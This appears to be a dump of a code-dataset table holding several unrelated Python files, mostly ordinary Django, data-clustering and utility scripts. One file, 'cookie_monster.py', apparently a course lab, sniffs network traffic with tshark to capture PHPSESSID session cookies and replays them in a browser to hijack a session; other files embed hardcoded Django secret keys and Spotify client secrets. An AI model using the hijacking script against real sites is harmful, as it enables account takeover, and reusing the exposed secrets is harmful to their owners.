blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
de443776aa84d3290318991589f034155c47b566
|
3244c110d230eb659edc1168ea02d8b9d2ea9ff5
|
/lab1/account.py
|
875989641b6264ee941508d53f5c9977956ae22f
|
[] |
no_license
|
thelloin/TDDA69_Data_And_Program_Structures
|
9f05228a35613f1917ba9fac03d2041d54400d09
|
5e2d6d750d1bcca5278341c72728891c3c510385
|
refs/heads/master
| 2021-01-11T14:59:04.070874
| 2017-05-22T18:38:11
| 2017-05-22T18:38:11
| 80,271,092
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 900
|
py
|
class AccountError(Exception):
def __init__(self, value):
self.value = value
def str(self):
return repr(self.value)
def make_account(balance, interest):
t = 0
def withdraw(amount, time):
nonlocal balance
nonlocal t
if time <= t:
raise AccountError("Timestamp error")
balance += (time - t) * interest * balance
t = time
if balance >= amount:
balance = balance - amount
else:
raise AccountError("Account balance too low")
def deposit(amount, time):
nonlocal balance
nonlocal t
if time <= t:
raise AccountError("Timestamp error")
balance += (time - t) * interest * balance
t = time
balance = balance + amount
def get_value():
return balance
public_methods = {'withdraw' : withdraw, 'deposit' : deposit, 'get_value' : get_value}
return public_methods
|
[
"tommy5545@gmail.com"
] |
tommy5545@gmail.com
|
0194081e4e86d0304d4fe64e144a7cd7f739f96c
|
3a8fa9bab6c128550adc469931bbd35439378ee8
|
/version0001/settings.py
|
8a45e4a1a22cdcf1b74ee63e3047de444b9335c4
|
[] |
no_license
|
hsubramani42/cloud_project
|
3d0d0b82172ac2286ce82bca5b9d6bb52d5c5dd1
|
3be9ab4d9935b772cb5b8273b4b2bd9a6ce07fc5
|
refs/heads/master
| 2023-08-22T23:58:48.007346
| 2021-10-05T13:08:13
| 2021-10-05T13:08:13
| 359,930,476
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,370
|
py
|
"""
Django settings for version0001 project.
Generated by 'django-admin startproject' using Django 3.0.5.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
TEMPLATES_DIR=os.path.join(BASE_DIR,'templates')
STATIC_DIR=os.path.join(BASE_DIR,'static')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'ddto9h==s%-qw8^ky9#%^_a@*3pp%q+cn&7g2djzl$%+*p5jvt'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ["*"]
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'MathClubVitap',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'version0001.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [TEMPLATES_DIR],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'version0001.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
MEDIA_URL='/media/'
MEDIA_ROOT=os.path.join(BASE_DIR,'media')
STATIC_ROOT=os.path.join(BASE_DIR,'static')
BASE_URL = "http://127.0.0.1:8000"
|
[
"hsubramani42@gmail.com"
] |
hsubramani42@gmail.com
|
9901a824036dae08fe6bba801ad4961fa53f3672
|
3160425b60cba9c5817bdf953fa082de0fd8ef4c
|
/labelImg.spec
|
1ac78b75769490c4beaa5d24e456b79b189ec0f6
|
[] |
no_license
|
dashengjiadao/LabelImg
|
5a8fa391575eb7d1f816f593be78d0f6645e78d1
|
5aa184c623e188eaedefa33407a4506fdb44504f
|
refs/heads/main
| 2023-06-05T08:12:25.532826
| 2021-06-23T07:35:54
| 2021-06-23T07:35:54
| 337,600,980
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 852
|
spec
|
# -*- mode: python ; coding: utf-8 -*-
block_cipher = None
a = Analysis(['labelImg.py'],
pathex=['E:\\Github\\LabelImg2'],
binaries=[],
datas=[],
hiddenimports=[],
hookspath=[],
runtime_hooks=[],
excludes=[],
win_no_prefer_redirects=False,
win_private_assemblies=False,
cipher=block_cipher,
noarchive=False)
pyz = PYZ(a.pure, a.zipped_data,
cipher=block_cipher)
exe = EXE(pyz,
a.scripts,
a.binaries,
a.zipfiles,
a.datas,
[],
name='labelImg',
debug=False,
bootloader_ignore_signals=False,
strip=False,
upx=True,
upx_exclude=[],
runtime_tmpdir=None,
console=True )
|
[
"34080594+dashengjiadao@users.noreply.github.com"
] |
34080594+dashengjiadao@users.noreply.github.com
|
6878f9da2eeca9ddd2bb8ec9ab3d5255a6eb960d
|
fc9421f8108ff1c78ba85cdb7afd7958f837414f
|
/ITBones/ITBones/money/urls.py
|
667f3bc6fa6e4c056f563ddb7e032f28dc907f23
|
[] |
no_license
|
itbones/ITBones
|
a2d426ad6881c880aeb6b57dcbede756730ca9fc
|
16176c3252e67a4ffbba0306ee1861cba8f149c2
|
refs/heads/master
| 2021-08-31T23:53:43.264947
| 2017-12-23T15:38:24
| 2017-12-23T15:38:24
| 112,016,434
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 330
|
py
|
from django.conf.urls import url
from . import views
app = 'money'
urlpatterns = [
url(r'^$', views.index, name='index'),
url(r'^addstock$', views.addstock, name='Add Stock'),
url(r'^sendemail$', views.sendemail, name='Send Email'),
url(r'^(?P<stockid>[0-9]+)/$', views.displaystock_v, name='Display Details'),
]
|
[
"itbonessolutions@gmail.com"
] |
itbonessolutions@gmail.com
|
5496363edf851bc2559b156493e669bb8d9513ff
|
96b9089ab9a98bb11361ca8757597dcfa8da517e
|
/KreditneKarticeProjekat/main.py
|
6151784825acee01ae0a299cb10fb9ce60894fc6
|
[] |
no_license
|
jovanakostres/ORIprojekat
|
53f8c1a6e96a797d05cf03fc50efca3acd20b5c5
|
bc1db841f0712b0d22988bf6d9dec4179fc2fb6a
|
refs/heads/master
| 2022-11-17T08:04:09.886981
| 2020-07-06T21:51:12
| 2020-07-06T21:51:12
| 263,088,365
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,490
|
py
|
import pandas
from pandas import DataFrame
import matplotlib.pyplot as plt
from sklearn.cluster import KMeans
import seaborn as sns
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.decomposition import PCA
import tkinter as tk
import tkinter.ttk as ttk
from ttkthemes import ThemedStyle
from tkinter import filedialog
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
from interpretation import cluster_report
from plotmultidim import plot_cluster
from plotmultidim2 import plot_clusters_2d, getElbow, getLabelsKMeans
Data = pandas.read_csv(r'credit_card_data.csv')
print(Data.describe())
df2 = DataFrame(Data, columns=['BALANCE','PURCHASES','ONEOFF_PURCHASES','CASH_ADVANCE', 'PURCHASES_FREQUENCY', 'ONEOFF_PURCHASES_FREQUENCY','CREDIT_LIMIT'])
df2['CREDIT_LIMIT'] = df2['CREDIT_LIMIT'].fillna(df2['CREDIT_LIMIT'].median())
X_df = df2.__deepcopy__()
X_df.sample(5, random_state=0)
pipeline = Pipeline(steps=[
('scaler', StandardScaler()),
('dim_reduction', PCA(n_components=2, random_state=0))
])
pc = pipeline.fit_transform(X_df)
# pccent = pipeline.fit_transform(kmeans_model.centroid_list)
y_labels = getLabelsKMeans(pc)
root= tk.Tk()
root.title("Credit Cards")
style = ThemedStyle(root)
style.set_theme('arc')
#print(style.theme_names())
canvas1 = tk.Canvas(root, width = 400, height = 300, relief = 'raised')
canvas1.pack()
label1 = ttk.Label(root, text='k-Means Clustering')
label1.config(font=('helvetica', 14))
canvas1.create_window(200, 25, window=label1)
def getHistogrami():
# Toplevel object which will
# be treated as a new window
newWindow = tk.Toplevel(root)
# sets the title of the
# Toplevel widget
newWindow.title("Analiza")
# sets the geometry of toplevel
newWindow.geometry("400x400")
# A Label widget to show in toplevel
ttk.Label(newWindow, text="Analiza podataka").pack()
make_label(newWindow, 10, 20, 380, 350, "Iznos koji je korisnik uplatio unapred (CASH_ADVANCE) i stanje na kartici (BALANCE) nalaze se u korelaciji tj., korisnik koji ima veće stanje će imati tendenciju da plaća iznosom koji je uplatio unapred. Takođe, korisnici koji imaju veće"
"stanje na računu će verovatno imati i veći kreditni limit (CREDITLIMIT)." + "\n" + "Iz histograma vezanog za stanje na kartici možemo videti da korisnici koji aktivno koriste svoje kreditne kartice teže da maksimalno koriste svoje kreditne kartice sve dok stanje ne padne na 0. "
" Histogram ukupnih iznosa potrošnih na kupovinu (PURCHASES) nam kaže da većina korisnika ne koristi svoje kreditne kartice za kupovinu, tek njih oko 40% koristi svoju kreditnu karticu u te svrhe. Limit većine korisnika kreditnih kartica je oko 1000.")
f, axes = plt.subplots(2, 4, figsize=(30, 30))
for ax, feature in zip(axes.flat, df2.columns):
sns.distplot(df2[feature], color="green", ax=ax)
plt.subplots_adjust(hspace=0.4, wspace=0.4)
plt.show()
histButton = ttk.Button(root, text=' Show Histograms', command=getHistogrami)
canvas1.create_window(200, 120, window=histButton)
processButton = ttk.Button(root, text=' Show Elbow Method ', command= lambda: getElbow(pc))
canvas1.create_window(200, 150, window=processButton)
clustersButton = ttk.Button(root, text=' Show Clusters in 2D', command= lambda: plot_clusters_2d(df2.__deepcopy__(), y_labels,pc))
canvas1.create_window(200, 180, window=clustersButton)
def openNewWindow():
# Toplevel object which will
# be treated as a new window
newWindow = tk.Toplevel(root)
# sets the title of the
# Toplevel widget
newWindow.title("Analiza")
# sets the geometry of toplevel
newWindow.geometry("1200x600")
# A Label widget to show in toplevel
ttk.Label(newWindow,
text="Analiza klastera").pack()
tab_parent = ttk.Notebook(newWindow)
tab1 = ttk.Frame(tab_parent)
tab2 = ttk.Frame(tab_parent)
tab3 = ttk.Frame(tab_parent)
tab4 = ttk.Frame(tab_parent)
tab5 = ttk.Frame(tab_parent)
tab6 = ttk.Frame(tab_parent)
tab7 = ttk.Frame(tab_parent)
tab_parent.add(tab1, text="Prvi klaster")
tab_parent.add(tab2, text="Drugi klaster")
tab_parent.add(tab3, text="Treci klaster")
tab_parent.add(tab4, text="Cetvrti klaster")
tab_parent.add(tab5, text="Peti klaster")
tab_parent.add(tab6, text="Sesti klaster")
tab_parent.add(tab7, text="Sedmi klaster")
tab_parent.pack(expand=1, fill='both')
cluster_map = pandas.DataFrame()
cluster_map['data_index'] = df2.index.values
cluster_map['cluster'] = y_labels
make_tab(tab1,cluster_map,0)
make_tab(tab2, cluster_map, 1)
make_tab(tab3, cluster_map, 2)
make_tab(tab4, cluster_map, 3)
make_tab(tab5, cluster_map, 4)
make_tab(tab6, cluster_map, 5)
make_tab(tab7, cluster_map, 6)
make_label(tab1, 10, 10, 600, 330, text='Korisnici u ovom klasteru retko kupuju. Stanja na računu su niska i odlikuje ih niska potrošnja. Retko kupuju jednokratno. Kada kupuju, kupuju stvari za male pare.')
make_label(tab2, 10, 10, 600, 330, text='Korisnici u ovom klasteru osrednje često do retko kupuju. Korisnici ove grupe koji imaju nisku količinu novca na racunu retko jednokratno kupuju, ali uplaćuju vece sume novca unapred. Dok korisnici koji imaju osrednju kolicinu novca na računu imaju veci kreditni limit, ali uplaćuju manje sume novca unapred.')
make_label(tab3, 10, 10, 600, 330, text='Korisnici u ovom klasteru osrednje često do retko kupuju. Stanja novca na računu su visoka i odlikuje ih niska potrošnja tokom kupovine. Kreditni limit i iznosi koje uplaćuju unapred na njihovim karticama su visoki. Predstavljaju osrednje korisnike kreditnih kartica.')
make_label(tab4, 10, 10, 600, 330, text='Korisnici u ovom klasteru često kupuju, ali retko kupuju jednokratno. Stanja na računu su niska i odlikuje ih niska potrošnja. Kreditni limit je osrednji. Niske uplate iznosa unapred. Kada kupuju, kupuju jeftinije stvari.')
make_label(tab5, 10, 10, 600, 330, text='Korisnici u ovom klasteru često kupuju u šta spadaju i jednokratne kupovine. Osrednje do nisko stanje novca na kartici i troše velike iznose. Visoki kreditni limit i niski iznosi uplata unapred. Veliki potrošači.')
make_label(tab6, 10, 10, 600, 330, text='Korisnici u ovom klasteru često kupuju i srednje do veoma često jednokratno kupuju. Stanja na računu su niska i odlikuje ih niski do srednji iznosi potrošnja. Osrednji iznos kreditnog limita i niski iznosi uplata unapred.')
make_label(tab7, 10, 10, 600, 330, text='Korisnici u ovom klasteru često kupuju u šta spadaju i jednokratne kupovine. Stanja na računu su osrednja i odlikuje ih visoki iznosi potrošnja. Visoki iznos kreditnog limita i niski iznosi uplata unapred.')
clusterReportButton = ttk.Button(root, text='Print Clusters Report', command=lambda: cluster_report(df2, y_labels, 10, 0.01))
canvas1.create_window(200, 210, window=clusterReportButton)
def make_tab(tab,cluster_map,cluster_num):
figure1 = plt.Figure(figsize=(8.5, 4), dpi=100)
ax1 = figure1.add_subplot(241)
ax1.hist(df2[df2.index.isin(cluster_map[cluster_map.cluster == cluster_num]['data_index'])]['BALANCE'])
ax1.set_title('BALANCE')
ax2 = figure1.add_subplot(242)
ax2.hist(df2[df2.index.isin(cluster_map[cluster_map.cluster == cluster_num]['data_index'])]['PURCHASES'])
ax2.set_title('PURCHASES')
ax3 = figure1.add_subplot(243)
ax3.hist(df2[df2.index.isin(cluster_map[cluster_map.cluster == cluster_num]['data_index'])]['ONEOFF_PURCHASES'])
ax3.set_title('ONEOFF PURCHASES')
ax4 = figure1.add_subplot(244)
ax4.hist(df2[df2.index.isin(cluster_map[cluster_map.cluster == cluster_num]['data_index'])]['CASH_ADVANCE'])
ax4.set_title('CASH ADVANCE')
ax5 = figure1.add_subplot(245)
ax5.hist(df2[df2.index.isin(cluster_map[cluster_map.cluster == cluster_num]['data_index'])]['PURCHASES_FREQUENCY'])
ax5.set_title('P. FREQUENCY')
ax6 = figure1.add_subplot(246)
ax6.hist(df2[df2.index.isin(cluster_map[cluster_map.cluster == cluster_num]['data_index'])]['ONEOFF_PURCHASES_FREQUENCY'])
ax6.set_title('OP FREQUENCY')
ax7 = figure1.add_subplot(247)
ax7.hist(df2[df2.index.isin(cluster_map[cluster_map.cluster == cluster_num]['data_index'])]['CREDIT_LIMIT'])
ax7.set_title('CREDIT LIMIT')
figure1.set_tight_layout(True)
scatter1 = FigureCanvasTkAgg(figure1, tab)
scatter1.get_tk_widget().pack(side=tk.RIGHT, fill=tk.BOTH)
def make_label(master, x, y, h, w, text):
f = ttk.Frame(master, height=h - 60, width=w)
f.pack_propagate(0) # don't shrink
f.place(x=x, y=y)
label = tk.Message(f, text=text, width=w - 10, anchor='n' )
label.configure(font=("Calibri", 12, "normal"))
label.pack(fill=tk.BOTH, expand=1)
return label
def printNesto():
print(y_labels)
prntButton = ttk.Button(root, text=' Cluster Analysis', command=openNewWindow)
canvas1.create_window(200, 240, window=prntButton)
root.mainloop()
'''
if __name__ == '__main__':
Data = {
'x': [25, 34, 22, 27, 33, 33, 31, 22, 35, 34, 67, 54, 57, 43, 50, 57, 59, 52, 65, 47, 49, 48, 35, 33, 44, 45,
38, 43, 51, 46],
'y': [79, 51, 53, 78, 59, 74, 73, 57, 69, 75, 51, 32, 40, 47, 53, 36, 35, 58, 59, 50, 25, 20, 14, 12, 20, 5, 29,
27, 8, 7]
}
df = DataFrame(Data, columns=['x', 'y'])
Data = pandas.read_csv(r'credit_card_data.csv')
print(Data.describe())
df = DataFrame(Data, columns=['BALANCE'])
df2 = DataFrame(Data, columns=['BALANCE','PURCHASES','ONEOFF_PURCHASES','CASH_ADVANCE', 'PURCHASES_FREQUENCY', 'ONEOFF_PURCHASES_FREQUENCY','CREDIT_LIMIT'])
df2['CREDIT_LIMIT'] = df2['CREDIT_LIMIT'].fillna(df2['CREDIT_LIMIT'].median())
#print(df2)
#df2['MINIMUM_PAYMENTS'] = df2['MINIMUM_PAYMENTS'].fillna(df2['MINIMUM_PAYMENTS'].median())
#df2.dropna(subset=['CREDIT_LIMIT'], inplace=True)
print(df2.isnull().sum())
#getElbow()
#kmeans = KMeans(n_clusters=4).fit(df)
#kmeans = KMeans(n_clusters=8, init='k-means++', random_state=101).fit(df2)
#centroids = kmeans.cluster_centers_
#print(centroids)
#print(df2['BALANCE'].index.values)
#plt.scatter(df2['BALANCE'].index.values,df2['BALANCE'], c=kmeans.labels_.astype(float), s=50, alpha=0.5)
#plt.scatter(centroids[:, 0], centroids[:, 1], c='red', s=50)
#plt.show()
#plot_cluster(df2.to_numpy(), kmeans.cluster_centers_, kmeans.labels_, 8)
y_cl = plot_clusters_2d(df2.__deepcopy__())
cluster_report(df2, y_cl.labels_,10,0.01)
def getKMeans():
global numberOfClusters
Data = pandas.read_csv(r'credit_card_data.csv')
df = DataFrame(Data, columns=['BALANCE', 'BALANCE_FREQUENCY'])
numberOfClusters = int(entry1.get())
kmeans = KMeans(n_clusters=numberOfClusters).fit(df)
centroids = kmeans.cluster_centers_
label3 = tk.Label(root, text=centroids)
canvas1.create_window(200, 250, window=label3)
figure1 = plt.Figure(figsize=(4, 3), dpi=100)
ax1 = figure1.add_subplot(111)
ax1.scatter(df['BALANCE'], df['BALANCE_FREQUENCY'], c=kmeans.labels_.astype(float), s=50, alpha=0.5)
ax1.scatter(centroids[:, 0], centroids[:, 1], c='red', s=50)
scatter1 = FigureCanvasTkAgg(figure1, root)
scatter1.get_tk_widget().pack(side=tk.RIGHT, fill=tk.BOTH)
'''
|
[
"jovanako15@gmail.com"
] |
jovanako15@gmail.com
|
4af3b0aea7e2f909a2c5d316c59783093ffc5ef5
|
0d182889379814038e48b4a5549df59401e8e257
|
/Higher_Education_Information_System/settings.py
|
0b2d3329c3ce47250370420c05b1bbfc0585c47c
|
[] |
no_license
|
amanishimwe/IUCEA
|
eaa774edb98c43c815fba95e61aca992b9939a3d
|
69557dd061c1bf55c060c02fd895544ae023e0ae
|
refs/heads/master
| 2023-05-31T07:14:43.999699
| 2021-07-11T12:20:27
| 2021-07-11T12:20:27
| 384,943,785
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,423
|
py
|
"""
Django settings for Higher_Education_Information_System project.
Generated by 'django-admin startproject' using Django 3.1.5.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
import os
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'lovfcmj3j00f()n=%c(rp=_)wj8bqg*iis2_)&(dq-ky&+!iwv'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'academic_programs_information_system',
'rest_framework',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'Higher_Education_Information_System.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
os.path.join(BASE_DIR, 'templates')
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'Higher_Education_Information_System.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'heis',
'USER': 'root',
'PASSWORD':'',
'HOST': 'localhost',
'PORT': '3306',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'static')
]
|
[
"alban.manishimwe@gmail.com"
] |
alban.manishimwe@gmail.com
|
16197b03f8829d17859f944f63d22a55d7e81fc0
|
fb0302e9fa08852e6b97031745423e5ddcd83313
|
/music_playlists.py
|
3da9c731e63d59d3d103e33cb03e5df6a73eb069
|
[] |
no_license
|
IsaiahWitzke/SpotifyToYoutube
|
a92a213a9adda8413de6c64373a7eb7aa5be752f
|
b66df1da83ff373e14efc384e6be69c489d74fb6
|
refs/heads/master
| 2020-12-29T05:05:37.391846
| 2020-02-05T14:08:57
| 2020-02-05T14:08:57
| 238,464,371
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,223
|
py
|
import sys
import os
import spotipy
import spotipy.util as util
scope = 'user-library-read'
os.system("export SPOTIPY_CLIENT_ID='aae63f05cceb4e8d87386f8ade1eed52'")
os.system("export SPOTIPY_CLIENT_SECRET='67338d34cf894ddcb65e5eb0f1b41b05'")
os.system("export SPOTIPY_REDIRECT_URI='localhost'")
if len(sys.argv) > 1:
username = sys.argv[1]
else:
print("Usage: %s username" % (sys.argv[0],))
sys.exit()
token = util.prompt_for_user_token(username, scope)
if token:
sp = spotipy.Spotify(auth=token)
results = sp.current_user_saved_tracks()
for item in results['items']:
track = item['track']
print(track['name'] + ' - ' + track['artists'][0]['name'])
else:
print("Can't get token for", username)
'''
birdy_uri = 'spotify:artist:2WX2uTcsvV5OnS0inACecP'
spotify = spotipy.Spotify()
util.prompt_for_user_token(username,scope,client_id='your-spotify-client-id',client_secret='your-spotify-client-secret',redirect_uri='your-app-redirect-url')
results = spotify.artist_albums(birdy_uri, album_type='album')
albums = results['items']
while results['next']:
results = spotify.next(results)
albums.extend(results['items'])
for album in albums:
print(album['name'])
'''
|
[
"noreply@github.com"
] |
IsaiahWitzke.noreply@github.com
|
10e4a7609ccf0eac6870626b7d0b21f2794c75a6
|
3ff99004a3bddb522e7778073bee5b07d953c043
|
/common/migrations/0006_auto_20200826_0055.py
|
094836bae92cff4ba5a5fc0f34baebf22e4e9acf
|
[] |
no_license
|
rimi-dev/modeling
|
8134e73300eaf159d9c3214f5ef513ec8241f062
|
777a1b587a1446ee73457d8ec18e0097d041700c
|
refs/heads/master
| 2022-12-10T07:17:27.704954
| 2020-08-26T05:24:46
| 2020-08-26T05:24:46
| 289,538,099
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 390
|
py
|
# Generated by Django 3.1 on 2020-08-26 00:55
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('common', '0005_auto_20200825_0138'),
]
operations = [
migrations.AlterField(
model_name='companycarcount',
name='count',
field=models.IntegerField(default=0),
),
]
|
[
"yerimi@kakao.com"
] |
yerimi@kakao.com
|
ff5ad551094fe09dde93eacb62fed9e8b88e910f
|
68087c1047211658a7af639e0168752b81008031
|
/lab2/cookie_monster.py
|
2c7e1c70ac2df51505f1cf486d6919cb6964cba4
|
[] |
no_license
|
barchuckie/computer-security
|
a9184ec92316f7f25706fd9bb0df0abaa18bfbbf
|
3bfd661a1107ee901e3e9f2e695a3670b8e582ef
|
refs/heads/master
| 2023-04-27T04:20:22.763607
| 2020-04-30T08:42:07
| 2020-04-30T08:42:07
| 219,340,323
| 0
| 0
| null | 2023-04-21T20:41:22
| 2019-11-03T17:41:37
|
Python
|
UTF-8
|
Python
| false
| false
| 1,278
|
py
|
import subprocess
import session_id_parser
from selenium import webdriver
def eat_cookie():
command = ['tshark', '-l', '-Y', 'http.request', '-T', 'fields', '-e', 'http.cookie']
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
pattern = {'name': '', 'value': ''}
while True:
output = process.stdout.readline().decode('utf-8')
if output == '' and process.poll() is not None:
break
if output:
cookie = session_id_parser.parse(output)
for key, value in cookie.items():
pattern['name'] = key
pattern['value'] = value
if pattern['name'] != '' and pattern['value'] != '':
print('Captured session ID: ', pattern['value'])
break
driver = webdriver.Safari(keep_alive=True)
driver.get('http://wppt.pwr.edu.pl')
print('Eating cookie with original session ID...')
print(driver.get_cookie('PHPSESSID'))
print('**OMM OMM OMM**')
driver.delete_cookie('PHPSESSID')
print('Replacing with captured session ID\n')
driver.add_cookie(pattern)
driver.refresh()
print('New cookies: ')
for cookie in driver.get_cookies():
print(cookie)
eat_cookie()
|
[
"barchuckie@outlook.com"
] |
barchuckie@outlook.com
|
7840325068ccd87e7c2f362d380348e978ad66c6
|
3cabd0d64827d18e9befc84ea935b767d4c69f28
|
/server/bin/artery/link_login_role.py
|
f260bcf01d0544c34b553af208e72a6f16fa3dbd
|
[] |
no_license
|
minghuizhou/PAR
|
2b528a4e7230aee1eb0ee3cfd12852d54e250a0b
|
bf8ee49516879aede8c312aef2ddeab92ebe5d47
|
refs/heads/master
| 2016-09-08T05:08:07.556630
| 2015-09-12T15:16:39
| 2015-09-12T15:16:39
| 42,352,036
| 0
| 2
| null | 2015-10-22T13:49:30
| 2015-09-12T09:40:26
|
Python
|
UTF-8
|
Python
| false
| false
| 1,396
|
py
|
#!/usr/bin/python
# Author: Xie Jialiang
# Date: 2012-11-16
# Function: link login experience to link file
# Parameters: 1) llevel4_assigning
# 2) login role
# 3) name of who field
# 4) name of when field
# 5) prefix of output field
# Output stream: linked llevel4_assigning
import sys
import level3_lib as lib3
import leon_lib as lib
# 1) read login_role
# dictionary login -> [list of roles]
rolepacks = {}
def read_role_body(header, raw, curline):
login = raw[header['who']]
raw_role = raw[header['role']].split(lib.tsep)
roles = []
for str_role in raw_role:
if str_role == '':
break
raw_role = str_role.split(lib.fsep)
newpack = lib.infopack()
newpack.data = raw_role[0]
newpack.when = int(raw_role[1])
roles.append(newpack)
rolepacks[login] = roles
lib.read_file(sys.argv[2], lib.empty_header, read_role_body)
# 2) link to level4_assigning
def link_header(header, raw, curline):
print curline[:-1] + lib.sep + sys.argv[5] + '_role'
def link_body(header, raw, curline):
login = raw[header[sys.argv[3]]]
when = int(raw[header[sys.argv[4]]])
# no one should remain 'unknow'
role = 'unknow'
if rolepacks.has_key(login):
index = lib.binary_search(rolepacks[login], lib.func_time, when)
if index >= 0:
role = rolepacks[login][index].data
print curline[:-1] + lib.sep + str(role)
lib.read_file(sys.argv[1], link_header, link_body)
|
[
"zhmh@pku.edu.cn"
] |
zhmh@pku.edu.cn
|
